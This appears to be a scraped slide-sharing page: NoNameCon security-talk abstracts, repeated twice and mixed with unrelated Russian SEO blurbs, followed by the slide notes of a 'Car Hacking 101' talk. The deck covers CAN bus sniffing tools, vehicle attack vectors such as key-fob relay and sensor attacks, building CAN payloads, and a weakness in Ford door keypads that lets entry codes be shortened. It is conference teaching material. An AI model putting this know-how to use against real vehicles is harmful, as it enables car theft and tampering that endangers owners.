- Мобильный web уже победил
- Что это значит для веб-мастеров
- Какие инструменты для повышения "мобильности" сайтов предлагает Google
- И какие изменения в ранжировании он внедряет
Доклад на конференции Optimization 2016.
Эта презентация подготовлена для мастер-класса Бориса Лепинских. Она поможет вам понять, за счет чего можно увеличить масштаб вашего бизнеса в сегменте электронной торговли.
1. Основные факторы текстового ранжирования.
а) Встречаемость слов и их вес.
Значимость факторов.
Рекомендации.
б) Фразовые соответствия.
Типы соответствия.
Использование в поиске и на практике.
в) Синонимы.
Определение.
Использование в тексте и на сайте.
2. Антиспам -VS- ранжирование.
3. Практические рекомендации по формированию ТЗ для копирайтера.
а) Формирование требований для копирайтера (ТЗ).
б) Основные ошибки, допускаемые оптимизаторами при формировании ТЗ.
4. Рекомендации.
Железные счётчики на страже производительностиSergey Kuksenko
Нередко при анализе производительности приложений приходится много копать. Но просто копать недостаточно, нужно еще разгребать накопанное. Железный век настал более 3000 лет назад, и было бы удивительно, если бы за это время человечество не создало кучу разнообразных железных приспособлений для копания и разгребания.
Данный доклад рассказывает, что же такое «Hardware Performance Counters», где их найти и как их можно использовать для анализа производительности.
- Мобильный web уже победил
- Что это значит для веб-мастеров
- Какие инструменты для повышения "мобильности" сайтов предлагает Google
- И какие изменения в ранжировании он внедряет
Доклад на конференции Optimization 2016.
Эта презентация подготовлена для мастер-класса Бориса Лепинских. Она поможет вам понять, за счет чего можно увеличить масштаб вашего бизнеса в сегменте электронной торговли.
1. Основные факторы текстового ранжирования.
а) Встречаемость слов и их вес.
Значимость факторов.
Рекомендации.
б) Фразовые соответствия.
Типы соответствия.
Использование в поиске и на практике.
в) Синонимы.
Определение.
Использование в тексте и на сайте.
2. Антиспам -VS- ранжирование.
3. Практические рекомендации по формированию ТЗ для копирайтера.
а) Формирование требований для копирайтера (ТЗ).
б) Основные ошибки, допускаемые оптимизаторами при формировании ТЗ.
4. Рекомендации.
Железные счётчики на страже производительностиSergey Kuksenko
Нередко при анализе производительности приложений приходится много копать. Но просто копать недостаточно, нужно еще разгребать накопанное. Железный век настал более 3000 лет назад, и было бы удивительно, если бы за это время человечество не создало кучу разнообразных железных приспособлений для копания и разгребания.
Данный доклад рассказывает, что же такое «Hardware Performance Counters», где их найти и как их можно использовать для анализа производительности.
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
https://cfp.nonamecon.org/nnc2020/talk/9LMJAH/
For many years, injection-based vulnerabilities such as XSS and SQL-injection have dominated the web security landscape. However, as browsers and applications are becoming increasingly complex, new vulnerability classes surface. One of these new-kids-on-the-block is XSLeaks, a vulnerability class that exploit side-channel leaks in the browser to extract information across origins. In this presentation, I will describe the various types of leaks in different browser features and the network layer, and discuss how these issues can be exploited to extract sensitive information from an unwitting victim. Furthermore, the talk will cover the numerous (new) defences that need to be adopted in order to safeguard web applications (SameSite cookies, COOP, COEP, ...), and their potential shortcomings. Finally, we will take a peak into the future, and discuss how XSLeaks will likely evolve in the coming months and years.
Originally published
https://speakerdeck.com/vixentael/data-encryption-cyberkids-edition
Exercises
https://www.dropbox.com/s/rbyvvaw9c7vs4ib/cyberkids-encryption-example.pdf?dl=0
NoName CyberKids – charity event for kids and their parents during NoNameCon to teach basics of privacy, security, encryption, anti-bullying, behaviour in social networks, lock picking.
https://nonamecon.org
https://www.facebook.com/events/2048121308814429/
Ihor Malchenyuk – What is privacy and how to protect it [NoName CyberKids]NoNameCon
NoName CyberKids – charity event for kids and their parents during NoNameCon to teach basics of privacy, security, encryption, anti-bullying, behaviour in social networks, lock picking.
https://nonamecon.org
https://www.facebook.com/events/2048121308814429/
Original slides
https://www.slideshare.net/OlgaPasko/hunting-fileless-malware-149129867
Workshop by Olha Pasko at NoNameCon 2019.
https://nonamecon.org
Fileless malware and system tools as bypass techniques in cyber-attack. Hunting with SysInternals tools and Digital Forensics techniques.
1. Fileless malware and system tools as bypass technique: an explanation of “bypass technique” and “fileless malware”. Creating custom fileless malware by abusing Powershell.
2. Threat hunting with Sysinternals tools: an explanation of system processes, threads, jobs, resources. Anomaly detection of system processes with Sysinternals tools. Fileless malware detection.
3. Threat hunting with Digital Forensics techniques: an explanation of “digital forensics”. Acquisition and analysis of RAM memory dump with Digital Forensics tools.
4. Summary or “what can participant obtain from this workshop”: knowledge about top bypass techniques, hard skills for detection and hunting malicious code, understand differences of hunting with SysInternals and Digital Forensics tools.
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...NoNameCon
Talk by Nazar Tymoshyk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/GSRUTP/
Incident Detection & Response requires People - to Think, Tools - to provide data and analytics and Processes - to avoid fuckups and assure the quality. But with more alerts, the analysis takes more time, decisions and moreover - actions need to be taken immediately. Attackers actively use automation, so Defenders should also optimize their processes.
In our presentation, we'd like to share with the community our lessons learned. Our focus would be on practical moments, the challenges we faced and the simple working solutions we discovered.
We plan to challenge the audience with simple but vital questions that will help to establish a good communication bridge to make this delivery effective and valuable for engineers to improve their defense. We'd like to discuss also a variety of actions to be taken after the incident is confirmed. Come and take it.
Ruslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографіїNoNameCon
Talk by Ruslan Kiyanchuk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/NKB9UF/
Огляд українських криптографічних алгоритмів та стандартів
З метою замінити застарілий радянський стандарт шифрування ГОСТ 28147-89 успадкований багатьма країнами СНД, у 2006-му році Служба Безпеки України оголосила відкритий конкурс криптографічних алгоритмів.
Знадобилося 8 років розробки, бюрократії, Майдан та революція, щоб стандарт нарешті прийняли: і ось у 2015-му році світ побачили ДСТУ 7624:2014 та ДСТУ 7564:2014 — українські національні стандарти криптографічного захисту інформації, розроблені українськими криптографами. Стандартизованими алгоритмами стали блоковий шифр «Калина» та функція хешування «Купина».
У доповіді розглянемо умови та хід проведення конкурсу, криптоалгоритми, котрі брали участь у конкурсі, їхні властивості, переваги та недоліки, а також перспективи застосування у сучасних інформаційних системах.
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...NoNameCon
Talk by Artem Storozhuk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/NUMHDY/
The search over encrypted data is the modern cryptographic engineering problem. We will talk about existing approaches (both well-known and modern), and concentrate on practical solution based on blind index technique to search data in databases. What’s inside: cryptographic and functional schemes, implementation details, practical security evaluation (risk modelling and potential attacks). We will show how theoretical models turn into real, usable, maintainable, security tools.
Lately most conscious companies store data in databases encrypted, but search over encrypted data is still a challenge. There are many existing academic solutions, proposed over the course of years, like CryptDB, Homomorphic/SSE, PEKS, Mylar. Unfortunately, most approaches are far from being production ready, usable and maintainable.
We will show the practical solution, that is based on a hardened version of blind indexing, a long-known technique that has several usability constraints and security caveats. There is an open source implementation CipherSweet, and cryptographically it’s pretty solid, but it stores keys on a client side, which may lead to potential problems during usage.
Our solution doesn't share this design approach, since the generation of index references and keys to them are stored in a separate node, away from all untrusted sides (client application, backend application, database). Also, our solution enforces several limitations on data, which is going to limit collision risks mentioned in the original technique.
We will explain in details how it works, show the functional and cryptographic schemes, and dig into implementation details. We will show to the attendees the process of building complex security tool from theoretical concepts (and mathematical models) to production-ready software.
Stephanie Vanroelen - Mobile Anti-Virus apps exposedNoNameCon
Talk by Stephanie Vanroelen at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/ZFJFW8/
This talk is about top anti-virus apps on Mobile. An in depth look on how they work and what they do. Do they add to or break the security of the mobile OS?
This talk is about top anti-virus apps on Android. An in-depth look at how they work and what they do.
The focus will be on the top 5 android apps:
Kaspersky Mobile Antivirus
Avast Mobile Security
Norton Security & Antivirus
Sophos Mobile Security
Security Master
This talk will try to answer the following questions: Do they add to or break the security of the Android sandbox system? What type of information is being shared back to the company (if any)? Are these apps well built?
Finally, I will address the following: Do I recommend any of these apps and if so which one and why?
Oksana Safronova - Will you detect it or not? How to check if security team i...NoNameCon
Talk by Oksana Safronova at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/AXCDXU/
Before the real incident happens, security team must test their detection capabilities in different ways. An overview of MITRE ATT&CK Matrix, test environments and other friends of Blue Team.
Obstacles, unexpected discoveries, lack of information, a flood of logs, new technologies - you will meet them all if you want to build an effective defense team. The talk will expend the next topics based on the experience we have:
How to test the security team's detection and incident response processes
Best practices for endpoint monitoring tools configuration
Some problems, that defense team can encounter
Additional resources that can help you detect threats
Bert Heitink - 10 major steps for CybersecurityNoNameCon
Talk by Bert Heitink at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/DXN7DM/
There's no such thing as 100% security, but this talk will demonstrate 10 main topics what needs attention to reduce the risk of being hacked.
Our current digital era creates a lot of possibilities, also for Ukraine! But how to deal with the threats on business and national level? 10 pragmatic steps you cannot ignore and are indisputable. Some are easy to implement, even tomorrow.
Ievgen Kulyk - Advanced reverse engineering techniques in unpackingNoNameCon
Talk by Ievgen Kulyk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/HMVMNL/
There are a lot of packers/protectors used to hide the functionality of the software. Sometimes this software is legal, sometimes malicious. It is vital to be able to unpack such software for future investigation. But the main issue is that many commercial protections use different algorithms to make automation of unpacking difficult. We will discuss more advanced techniques that are powerful and can be used to break strong protection. We will talk about debugging without debugging API. Year, it's strange but it's real life.
During the debugging, we often talk about debugging API on windows or ptrace routine on Linux. These mechanisms are provided by OS developers. So it is strongly recommended to use them for user-mode debugging (debugging in ring3). But software protection systems can use a lot of techniques for detecting and preventing debugging.
In practical reverse engineering anti-anti debugging plugins can be used. The most famous of them: - Phantom and StrongOD (for OllyDbg); - ScyllaHide (for x64dbg, IDA Pro)
But such plugins can only protect from well-known detection algorithms. If some unknown technique will be used they will fail. So we will talk about how to implement your own tracing/debugging engine without debugging API and hide such an engine from anti-debug. We will dive into kernel development and implement our engine from scratch.
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...NoNameCon
Talk byStanislav Kolenkin & Igor Khoroshchenko at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/3EXNKX/
We will try to describe the most interesting security problems with Kubernetes environments from a DevOps and Security side.
We'll discuss the actual cloud security threats and trends for 2019.
Look behind the curtain of modern data breaches, weak identity and access management and incident response flaws.
The rise of Serverless and Kubernetes as Enterprise solutions and lack of related security expertise during SDLC.
Summarize the analytics and practical researches on adversaries techniques and tactics, a mass scan of cloud services and the uncertainty of business impacts behind them.
Provide materials for further education.
Pavlo Zhavoronkov - What is autumn like in prison camps?NoNameCon
Talk by Pavlo Zhavoronkov at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/BARKBD/
This speech will give you a complete understanding of how to get in jail by doing cybercrimes in Ukraine.
What is autumn like in prison camps?
This speech will give you a complete understanding of how to get in jail by doing cybercrimes in Ukraine.
Speech contents:
The complete overview of Ukrainian court practice on articles in the section "CRIME IN THE FIELD OF USE OF ELECTRONIC COMPUTING MACHINES (COMPUTERS), SYSTEMS AND COMPUTER NETWORKS AND DIGITAL COMMUNICATIONS NETWORKS" of the Criminal Code of Ukraine.
Stories about the most famous Ukrainian cybercriminals.
Thoughts on current state of Ukrainian judicial system.
Alexander Olenyev & Andrey Voloshin - Car Hacking: Yes, You can do that!NoNameCon
Talk by Alexander Olenyev & Andrey Voloshin at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/AARZTL/
The complete list of (I hope) all {not only} publicly disclosed vulnerabilities in car hacking. Contains a detailed description of Who When How has been hacked, toolz and technics. Encourage every other-field pentester to use their skills in car hacking giving fundamental knowledge of where to start and what to expect. Tesla, BMW, Toyota, Nissan — few words about all of them
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...NoNameCon
Talk by Kostiantyn Korsun at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/DA3TLK/
Про роль кібер-волонтерів та кібер-чиновників у сучасній кібер-війні
Кібервійна проти України триває вже п'ять років. За цей час регулярні війська України стали однією з найбільш боєздатних армій Європи та Світу. Але чи став таким ж крутими кіберзахист України?
У виступі серед інших обговорюватимуться наступні питання: Роль кібер-волонтерів та кібер-чиновників у сучасній кібер-війні; Наскільки ефективний кіберзахист державним коштом та скільки це коштує платнику податків; Оціночна ефективність роботи кібер-чиновників та кібер-міністерства; Яким шляхом краще йти кібер-Україні: довгим чи коротким, дешевим чи дорогим, закритим чи прозорим?
Презентація майже повністю складається зі скріншотів #FRD та демонструє ретроспективу ролі волонтерської ініціативи #FRD та зміну ставлення до неї з часом.
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
https://cfp.nonamecon.org/nnc2020/talk/9LMJAH/
For many years, injection-based vulnerabilities such as XSS and SQL-injection have dominated the web security landscape. However, as browsers and applications are becoming increasingly complex, new vulnerability classes surface. One of these new-kids-on-the-block is XSLeaks, a vulnerability class that exploit side-channel leaks in the browser to extract information across origins. In this presentation, I will describe the various types of leaks in different browser features and the network layer, and discuss how these issues can be exploited to extract sensitive information from an unwitting victim. Furthermore, the talk will cover the numerous (new) defences that need to be adopted in order to safeguard web applications (SameSite cookies, COOP, COEP, ...), and their potential shortcomings. Finally, we will take a peak into the future, and discuss how XSLeaks will likely evolve in the coming months and years.
Originally published
https://speakerdeck.com/vixentael/data-encryption-cyberkids-edition
Exercises
https://www.dropbox.com/s/rbyvvaw9c7vs4ib/cyberkids-encryption-example.pdf?dl=0
NoName CyberKids – charity event for kids and their parents during NoNameCon to teach basics of privacy, security, encryption, anti-bullying, behaviour in social networks, lock picking.
https://nonamecon.org
https://www.facebook.com/events/2048121308814429/
Ihor Malchenyuk – What is privacy and how to protect it [NoName CyberKids]NoNameCon
NoName CyberKids – charity event for kids and their parents during NoNameCon to teach basics of privacy, security, encryption, anti-bullying, behaviour in social networks, lock picking.
https://nonamecon.org
https://www.facebook.com/events/2048121308814429/
Original slides
https://www.slideshare.net/OlgaPasko/hunting-fileless-malware-149129867
Workshop by Olha Pasko at NoNameCon 2019.
https://nonamecon.org
Fileless malware and system tools as bypass techniques in cyber-attack. Hunting with SysInternals tools and Digital Forensics techniques.
1. Fileless malware and system tools as bypass technique: an explanation of “bypass technique” and “fileless malware”. Creating custom fileless malware by abusing Powershell.
2. Threat hunting with Sysinternals tools: an explanation of system processes, threads, jobs, resources. Anomaly detection of system processes with Sysinternals tools. Fileless malware detection.
3. Threat hunting with Digital Forensics techniques: an explanation of “digital forensics”. Acquisition and analysis of RAM memory dump with Digital Forensics tools.
4. Summary or “what can participant obtain from this workshop”: knowledge about top bypass techniques, hard skills for detection and hunting malicious code, understand differences of hunting with SysInternals and Digital Forensics tools.
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro...NoNameCon
Talk by Nazar Tymoshyk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/GSRUTP/
Incident Detection & Response requires People - to Think, Tools - to provide data and analytics and Processes - to avoid fuckups and assure the quality. But with more alerts, the analysis takes more time, decisions and moreover - actions need to be taken immediately. Attackers actively use automation, so Defenders should also optimize their processes.
In our presentation, we'd like to share with the community our lessons learned. Our focus would be on practical moments, the challenges we faced and the simple working solutions we discovered.
We plan to challenge the audience with simple but vital questions that will help to establish a good communication bridge to make this delivery effective and valuable for engineers to improve their defense. We'd like to discuss also a variety of actions to be taken after the incident is confirmed. Come and take it.
Ruslan Kiyanchuk - Калина, Купина, та інша флора вітчизняної криптографіїNoNameCon
Talk by Ruslan Kiyanchuk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/NKB9UF/
Огляд українських криптографічних алгоритмів та стандартів
З метою замінити застарілий радянський стандарт шифрування ГОСТ 28147-89 успадкований багатьма країнами СНД, у 2006-му році Служба Безпеки України оголосила відкритий конкурс криптографічних алгоритмів.
Знадобилося 8 років розробки, бюрократії, Майдан та революція, щоб стандарт нарешті прийняли: і ось у 2015-му році світ побачили ДСТУ 7624:2014 та ДСТУ 7564:2014 — українські національні стандарти криптографічного захисту інформації, розроблені українськими криптографами. Стандартизованими алгоритмами стали блоковий шифр «Калина» та функція хешування «Купина».
У доповіді розглянемо умови та хід проведення конкурсу, криптоалгоритми, котрі брали участь у конкурсі, їхні властивості, переваги та недоліки, а також перспективи застосування у сучасних інформаційних системах.
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...NoNameCon
Talk by Artem Storozhuk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/NUMHDY/
The search over encrypted data is the modern cryptographic engineering problem. We will talk about existing approaches (both well-known and modern), and concentrate on practical solution based on blind index technique to search data in databases. What’s inside: cryptographic and functional schemes, implementation details, practical security evaluation (risk modelling and potential attacks). We will show how theoretical models turn into real, usable, maintainable, security tools.
Lately most conscious companies store data in databases encrypted, but search over encrypted data is still a challenge. There are many existing academic solutions, proposed over the course of years, like CryptDB, Homomorphic/SSE, PEKS, Mylar. Unfortunately, most approaches are far from being production ready, usable and maintainable.
We will show the practical solution, that is based on a hardened version of blind indexing, a long-known technique that has several usability constraints and security caveats. There is an open source implementation CipherSweet, and cryptographically it’s pretty solid, but it stores keys on a client side, which may lead to potential problems during usage.
Our solution doesn't share this design approach, since the generation of index references and keys to them are stored in a separate node, away from all untrusted sides (client application, backend application, database). Also, our solution enforces several limitations on data, which is going to limit collision risks mentioned in the original technique.
We will explain in details how it works, show the functional and cryptographic schemes, and dig into implementation details. We will show to the attendees the process of building complex security tool from theoretical concepts (and mathematical models) to production-ready software.
Stephanie Vanroelen - Mobile Anti-Virus apps exposedNoNameCon
Talk by Stephanie Vanroelen at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/ZFJFW8/
This talk is about top anti-virus apps on Mobile. An in depth look on how they work and what they do. Do they add to or break the security of the mobile OS?
This talk is about top anti-virus apps on Android. An in-depth look at how they work and what they do.
The focus will be on the top 5 android apps:
Kaspersky Mobile Antivirus
Avast Mobile Security
Norton Security & Antivirus
Sophos Mobile Security
Security Master
This talk will try to answer the following questions: Do they add to or break the security of the Android sandbox system? What type of information is being shared back to the company (if any)? Are these apps well built?
Finally, I will address the following: Do I recommend any of these apps and if so which one and why?
Oksana Safronova - Will you detect it or not? How to check if security team i...NoNameCon
Talk by Oksana Safronova at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/AXCDXU/
Before the real incident happens, security team must test their detection capabilities in different ways. An overview of MITRE ATT&CK Matrix, test environments and other friends of Blue Team.
Obstacles, unexpected discoveries, lack of information, a flood of logs, new technologies - you will meet them all if you want to build an effective defense team. The talk will expend the next topics based on the experience we have:
How to test the security team's detection and incident response processes
Best practices for endpoint monitoring tools configuration
Some problems, that defense team can encounter
Additional resources that can help you detect threats
Bert Heitink - 10 major steps for CybersecurityNoNameCon
Talk by Bert Heitink at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/DXN7DM/
There's no such thing as 100% security, but this talk will demonstrate 10 main topics what needs attention to reduce the risk of being hacked.
Our current digital era creates a lot of possibilities, also for Ukraine! But how to deal with the threats on business and national level? 10 pragmatic steps you cannot ignore and are indisputable. Some are easy to implement, even tomorrow.
Ievgen Kulyk - Advanced reverse engineering techniques in unpackingNoNameCon
Talk by Ievgen Kulyk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/HMVMNL/
There are a lot of packers/protectors used to hide the functionality of the software. Sometimes this software is legal, sometimes malicious. It is vital to be able to unpack such software for future investigation. But the main issue is that many commercial protections use different algorithms to make automation of unpacking difficult. We will discuss more advanced techniques that are powerful and can be used to break strong protection. We will talk about debugging without debugging API. Year, it's strange but it's real life.
During the debugging, we often talk about debugging API on windows or ptrace routine on Linux. These mechanisms are provided by OS developers. So it is strongly recommended to use them for user-mode debugging (debugging in ring3). But software protection systems can use a lot of techniques for detecting and preventing debugging.
In practical reverse engineering anti-anti debugging plugins can be used. The most famous of them: - Phantom and StrongOD (for OllyDbg); - ScyllaHide (for x64dbg, IDA Pro)
But such plugins can only protect from well-known detection algorithms. If some unknown technique will be used they will fail. So we will talk about how to implement your own tracing/debugging engine without debugging API and hide such an engine from anti-debug. We will dive into kernel development and implement our engine from scratch.
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...NoNameCon
Talk byStanislav Kolenkin & Igor Khoroshchenko at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/3EXNKX/
We will try to describe the most interesting security problems with Kubernetes environments from a DevOps and Security side.
We'll discuss the actual cloud security threats and trends for 2019.
Look behind the curtain of modern data breaches, weak identity and access management and incident response flaws.
The rise of Serverless and Kubernetes as Enterprise solutions and lack of related security expertise during SDLC.
Summarize the analytics and practical researches on adversaries techniques and tactics, a mass scan of cloud services and the uncertainty of business impacts behind them.
Provide materials for further education.
Pavlo Zhavoronkov - What is autumn like in prison camps?NoNameCon
Talk by Pavlo Zhavoronkov at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/BARKBD/
This speech will give you a complete understanding of how to get in jail by doing cybercrimes in Ukraine.
What is autumn like in prison camps?
This speech will give you a complete understanding of how to get in jail by doing cybercrimes in Ukraine.
Speech contents:
The complete overview of Ukrainian court practice on articles in the section "CRIME IN THE FIELD OF USE OF ELECTRONIC COMPUTING MACHINES (COMPUTERS), SYSTEMS AND COMPUTER NETWORKS AND DIGITAL COMMUNICATIONS NETWORKS" of the Criminal Code of Ukraine.
Stories about the most famous Ukrainian cybercriminals.
Thoughts on current state of Ukrainian judicial system.
Alexander Olenyev & Andrey Voloshin - Car Hacking: Yes, You can do that!NoNameCon
Talk by Alexander Olenyev & Andrey Voloshin at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/AARZTL/
The complete list of (I hope) all {not only} publicly disclosed vulnerabilities in car hacking. Contains a detailed description of Who When How has been hacked, toolz and technics. Encourage every other-field pentester to use their skills in car hacking giving fundamental knowledge of where to start and what to expect. Tesla, BMW, Toyota, Nissan — few words about all of them
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ...NoNameCon
Talk by Kostiantyn Korsun at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/DA3TLK/
Про роль кібер-волонтерів та кібер-чиновників у сучасній кібер-війні
Кібервійна проти України триває вже п'ять років. За цей час регулярні війська України стали однією з найбільш боєздатних армій Європи та Світу. Але чи став таким ж крутими кіберзахист України?
У виступі серед інших обговорюватимуться наступні питання: Роль кібер-волонтерів та кібер-чиновників у сучасній кібер-війні; Наскільки ефективний кіберзахист державним коштом та скільки це коштує платнику податків; Оціночна ефективність роботи кібер-чиновників та кібер-міністерства; Яким шляхом краще йти кібер-Україні: довгим чи коротким, дешевим чи дорогим, закритим чи прозорим?
Презентація майже повністю складається зі скріншотів #FRD та демонструє ретроспективу ролі волонтерської ініціативи #FRD та зміну ставлення до неї з часом.
Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...
Alexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameCon
1. Car Hacking 101
Andrey Voloshin
CTO @ Thea
https://thea-auto.com
andrey@thea-auto.com
fb.com/anvol
Рынок automotive сильно изменяется. Ситуация с безопасностью автомобилей будет улучшаться, но есть ряд проблем, которые мешают поднять ее до
необходимого уровня прямо сегодня
2. То, что мы видим как один автомобиль или бренд делается сотнями разных компаний. Более того, для разных географических рынков поставщики
отличаются
3. Tiered supply chain
Структура поставщиков для OEMов выглядит следующим образом. Каждый участник этой цепочки должен обеспечивать безопасность своих процессов и
поставляемых компонентов
4. Attack vectors
1 2 3 4. Aftermarket
Можно выделить 4 основных вектора атак.
- Поставщики компонентов
- собственно, автозавод
- логистика и автодилеры
- владелец автомобиля и собственно его автомобиль
5. Attack vectors
1 2 3 4. Aftermarket
1. PKI, secure boot, source codes, backdoors, etc
2. OEM backend infrastructure (including app stores, multimedia, databases, documentation)
3. Diagnostic equipment, engineer codes, key duplicates, etc
4. Control car, steal car, dump private data, etc
Каждый из векторов содержит свой лакомый кусочек. В целом, атаки на 3, 2, 1 являются наиболее сложными (high-profile attacks) но и наиболее урожайными
6. Percentage of respondents who want security
but are unwilling to pay premium for it
В то же время, исходя из анализа рынка — никто особо не хочет платить за безопасность
7. TL;DR — F* security
это создает окно возможности, где триггером или стимулом для быстрого введения дорогостоящих средств защиты будет письмо утром…
8. –Robert Bates, chief safety officer for automotive at Mentor, a Siemens Business
If I am the CEO of General Motors, five years
from now the last thing I want to see is an email
in my inbox in the morning that says
‘Pay me $2 billion or else all of your cars are
going to turn left.’
каждый дополнительный или усложненный элемент автомобиля удорожает его. Потому новый функционал появляется в первую очередь в топовых
комплектациях и моделях и только потом мигрирует в дешевые
9. – Serious Anonymous
Yeah, go hack my Daewoo Lanos, lamo
но основную массу составляют средние и дешевые тачки
10. – Serious Anonymous
Most of them are cheap
сколько вы видите тут Тесл? Порше? Это дешевые доступные автомобили
12. CANbus
• Development of the CANbus started in 1983 at Bosch
• No encryption, no authorization, broadcast, fully trusted network
• Released in 1986 at the Society of Automotive Engineers (SAE) conference in
Detroit, Michigan
• CAN device that uses 11-bit identifiers is commonly called CAN 2.0A
• CAN device that uses 29-bit identifiers is commonly called CAN 2.0B
• The 1988 BMW 8 Series was the first production vehicle to feature a CAN-based
multiplex wiring system
одним из повсеместных улучшений стало использование CANbus для обмена данными между компонентами автомобиля
13. CAN Network
кан сеть представляет из себя общую одноранговую шину с подключенными к ней устройствами.
14. в автомобиле может быть несколько кан шин, которые работают на разной скорости
15. наиболее известный вариант подключения — диагностический разъем. Он обязательно присутствует в легковых автомобилях, это требуется сертификацией
для продажи в Европе и США
16. приборная панель — еще одна удобная точка подключения и получения информации с кан шины
19. In-vehicle Infotainment system
• Connectivity (BT, GSM, USB, WiFi)
• QNX — UNIX-based OS
• Connected to CANbus
Наличие беспроводных интерфейсов, проводных интерфейсов, СД/ДВД, полноценная ОС иногда даже с выходом в интернет. Часто встречается ситуация,
когда все таски ОС имеют полный доступ на чтение/запись кан шины. Возможно у вас есть опыт работы в Люксофте на проектах по разработке IVI, тогда вы
знаете намного больше деталей…
20. – 115th Congress (2017-2018): SPY Car Act of 2017
ISOLATION MEASURES.—The measures referred to in
subparagraph (A) shall incorporate isolation
measures to separate critical software systems from
noncritical software systems.
Ситуация с отсутсвием сегментации сети достаточно плачевна. Именно через IVI систему в свое время хакеры получили контроль над Jeep и удаленно могли
нарушать его работу. В США в июле был выдвинут законопроект о штрафах автопроизводителей за такую лажу в архитектуре (8к долларов/тачку если там
нет изоляции)
21. с появлением систем ADAS (advanced driver-assistance systems) увеличилось количество сенсоров и интерфейсов, через которые можно попасть в кишки
автомобиля
22. Attack
• Physical access: buy/rent a car, ECU, IVI and sniff it, prepare payloads
• Near access: FCC ID + Software Defined Radio, Key fob Relay/
Amplification attacks, PKES, Flood or send malformed data to sensors
• AI specific: signal absorbing materials, fool AI with perturbations (next
slide)
• Remote access: hack into backend infrastructure, OTA Updates, App
Store, master keys, encryption keys
план атак выглядит следующим образом:
- получить в руки машину или ее компоненты и реверсить их для понимания работы и создания payloads. В том числе, анализ беспроводных интерфейсов
(иммобилайзер, key fobs, PassiveKeylessEntryStart systems), атаки на компьютерное зрение и машинное обучение, fuzzing.
- отдельно стоит напомнить, что там, в облаке, крутится инфраструктура, которая как и любой другой сложный продукт потенциально содержит уязвимости
23. Universal adversarial perturbations
интересный пример атаки (февраль 2018) на компьютерное зрение. Внесение небольших искажений в картинки радикально влияет на распознавание образа
нейронкой. “ИИ” — это всего лишь умножение матриц, а человеческому мозгу не нужно 100500 картинок унитаза и далматинца, чтобы научиться их
различать.
24. Tools
• Connectors
• Logic Analyzer
• CAN sniffer
• Hackware
Из необходимых инструментов стоит выделить CAN sniffer и софт для анализа кан шины
25. Tools
• OS Setup: GNU/Linux, SocketCAN + can-utils (CAN -> USB -> can0),
• Software: Wireshark, SavvyCAN, etc
• Hardware: buy or DIY. Choose wisely, it should support slcan/SocketCAN
protocol. We choose STM32+MCP2551
• https://github.com/torvalds/linux/blob/master/drivers/net/can/slcan.c
сетап выглядит следующим образом. Настоятельно рекомендую использовать устройва поддерживающие SocketCAN/slcan. Это позволит использовать весь
набор инструментов, которые в своей время коммитнул фольксваген в ядро линухи. Фактически, здесь на слайде представлено то, что мы будем делать и
изучать завтра на воркшопе
26. знакомый wireshark видит can интерфейс и весело логирует все фреймы, которые поймал. Но проблема в том, что кан шины более специфична
27. в каждом CAN фрейме есть ID и данные. Под одним и тем же ID гуляют одни и те же данные. Например, если под ID 0x27 в первом байте передается
температура двигателя, то она всегда в этом автомобиле будет передаваться под ID 0x27 в первом байте.
28. – Serious Anonymous
Have fun
суть реверса состоит в определении под какими ИД ходят какие данные и использование этой информации для создания пейлоада
29. – Serious Anonymous
Or not so much…
процесс очень напоминает работу с ArtMoney, только удовольствия чуть меньше…
31. Bonus: keypad hack
в автомобилях форд можно встретить такие кодовые замки. Особенность их в том, что они проверяют код скользящим окном. Другими словами, если вы
вбиваете 12345, а настоящий код = 2345, то дверь откроется